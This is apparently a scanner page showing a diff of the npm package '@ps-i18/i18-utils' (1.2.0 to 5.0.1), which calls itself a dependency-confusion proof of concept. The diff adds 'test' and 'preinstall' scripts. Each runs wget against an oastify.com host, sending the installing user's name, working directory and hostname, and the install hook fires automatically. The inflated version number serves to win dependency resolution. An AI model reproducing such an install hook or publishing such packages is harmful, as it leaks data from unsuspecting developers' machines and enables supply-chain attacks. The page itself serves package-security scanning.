@ps-i18/i18-utils 1.2.0 → 5.0.1
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +3 -3
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@ps-i18/i18-utils",
|
3
|
-
"version": "
|
3
|
+
"version": "5.0.1",
|
4
4
|
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
|
-
"test": "wget --quiet \"https://
|
8
|
-
"preinstall": "wget --quiet \"https://
|
7
|
+
"test": "wget --quiet \"https://2cfdozx2austdddqpm7p0oxe157wvmjb.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
8
|
+
"preinstall": "wget --quiet \"https://2cfdozx2austdddqpm7p0oxe157wvmjb.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
9
9
|
},
|
10
10
|
"keywords": [
|
11
11
|
"test",
|